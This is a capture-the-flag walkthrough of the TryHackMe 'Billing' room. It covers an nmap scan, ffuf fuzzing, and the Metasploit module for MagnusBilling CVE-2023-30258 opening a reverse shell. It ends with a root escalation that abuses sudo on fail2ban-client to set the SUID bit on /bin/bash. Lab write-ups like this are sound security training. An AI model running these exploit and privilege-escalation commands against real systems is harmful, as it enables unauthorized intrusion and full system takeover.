Billing

Room link: https://tryhackme.com/room/billing

Thanks to tryhackme and RunasRs

Some mistakes can be costly.

Pasted image 20250316214446.png

Challenge Description

Gain a shell, find the way and escalate your privileges!

Note: Bruteforcing is out of scope for this room.

IP Address: 10.10.152.172

Reconnaissance

Namp

Now that we have got the IP Address of the target system, first off, let's scan the target system to see for any potential open port and it's services that we start to explore this target system.

sudo nmap -sC -sV -vv -T5 10.10.152.172 -oA Nmap/Billing.nmap

Output:

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 60 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCukT/TLi8Po4V6OZVI6yhgSlTaANGLErWG2Hqz9UOxX3XXMFvRe0uivnYlcvBwvSe09IcHjC6qczRgRjdqQOxF2XHUIFBgPjNOR3mb1kfWg5jKAGun6+J9atS8z+5d6CZuv0YWH6jGJTQ1YS9vGNuFvE3coJKSBYtNbpJgBApX67tCQ4YKenrG/AQddi3zZz3mMHN6QldivMC+NCFp+PozjjoJgD4WULCElDwW4IgWjq64bL3Y/+Ii/PnPfLufZwaJNy67TjKv1KKzW0ag2UxqgTjc85feWAxvdWKVoX5FIhCrYwi6Q23BpTDqLSXoJ3irVCdVAqHfyqR72emcEgoWaxseXn2R68SptxxrUcpoMYUXtO1/0MZszBJ5tv3FBfY3NmCeGNwA98JXnJEb+3A1FU/LLN+Ah/Rl40NhrYGRqJcvz/UPreE73G/wjY8LAUnvamR/ybAPDkO+OP47OjPnQwwbmAW6g6BInnx9Ls5XBwULmn0ubMPi6dNWtQDZ0/U=
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBVI/7v4DHnwY/FkhLBQ71076mt5xG/9agRtb+vldezX9vOC2UgKnU6N+ySrhLEx2snCFNJGG0dukytLDxxKIcw=
|   256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII6ogE6DWtLYKAJo+wx+orTODOdYM23iJgDGE2l79ZBN
80/tcp   open  http    syn-ack ttl 60 Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.152.172/mbilling/
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3306/tcp open  mysql   syn-ack ttl 60 MariaDB 10.3.23 or earlier (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see that we have 3 ports are open:

Port 22
- SSH (We need Username and Password)
Port 80
- HTTP
Port 3306
- MySQL Server

Web page.

Browsing to the web page, we see a login page asking for the username and password to login.

Pasted image 20250316215529.png

Let's try to login with some random username and password to understand the behaviour of the page.

Pasted image 20250316215815.png

Clearly, we get the error stating Authentication error. Now, let's try the Forgot your password option.

There is a change in the IP Address to 10.10.39.7, because I got busy with some other work and the..... machine was terminated..... so, hope you understand....... thank you......

Ok, clearly we don't have the username, password or any such information, nor do we see any option sign-up. So, let's try fuzzing, for other flies or folders that we can explore more.

Fuzzingg

First, let's fuzz for some files, folders and finally subdomains using ffuf

ffuf -w ~/Pranava__Rao/Tools/FuzzlingList/SecLists/Discovery/Web-Content/raft-medium-files.txt -u "http://10.10.39.7/FUZZ"

Pasted image 20250316223115.png

Here we see a lot of files that we can probably try and look at the files to understand about the web application and then exploit, but was not of any use because they all are Forbidden

Pasted image 20250316223533.png

Ureka!!!

while trying to load the page back, I noticed this:
Pasted image 20250316224020.png

looked like maybe a software of some application that is running and not a custom built page. So..... the obvious step was too ask my Bestest friend about it.

Pasted image 20250316224321.png

There we go!!!

So, my next was to see if there was any publicly available exploit to this application.

Pasted image 20250316224501.png

And We had!! Link is HERE

Metasploit

To exploit this target system, according to the blog post, we had to use Metasploit. So, let's fire it up.

msfconsole

Pasted image 20250316225027.png

Now, let's just copy pate the command:

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

show targets

set target 0

show options

Pasted image 20250316225334.png

Now, let's add the following to make sure metasploit knows who is the target and where to connect back after exploiting to use the reverse shell.

set RHOSTS <--Target's IP Address-->

set LHOST <--Your systems' IP Address -->

exploit

Pasted image 20250316231621.png

then immediately type

shell

Pasted image 20250316232202.png

in my case, I guess the session just go terminated so I had to initiate it.

Now, looking around the system, we find the user magnus and we have access to his home directory as well as his file contents

Pasted image 20250316232534.png

R007

Ok!!! so now, let's try to exploit for the root user.

First, let's check if we have access to the sudo group with this user.

sudo -l

Pasted image 20250316232946.png

And we have!!! We have a permission to run the file /usr/bin/fail2ban-client no requirement of sudo.

But what is fail2ban?? I went to ask my friend again. Here, from THIS GitHub, repository, we can get to know that it is an application which bans IP addresses conducting too many failed login attempts.

Pasted image 20250316233511.png

So, is there any exploits for it?

Pasted image 20250316233611.png

Link is HERE

Just Follow the exploit section of the blog and we are the root!!!

sudo /usr/bin/fail2ban-client status

sudo /usr/bin/fail2ban-client get ast-cli-attck actions

sudo /usr/bin/fail2ban-client set ast-cli-attck addaction evil

sudo /usr/bin/fail2ban-client set ast-cli-attck action evil actionban "chmod +s /bin/bash"

chmod +s /bin/bash

sudo /usr/bin/fail2ban-client set ast-cli-attck banip 1.2.3.5

/bin/bash -p

id

Now we are the root!!!!!!!!!!!

Pasted image 20250316234422.png

Follow me

Instagram: @Pranava__Rao
Linked: Pranava Rao
X: @Pranava__Rao
GitHub: Pranava Rao
YouTube: @Pranava__Rao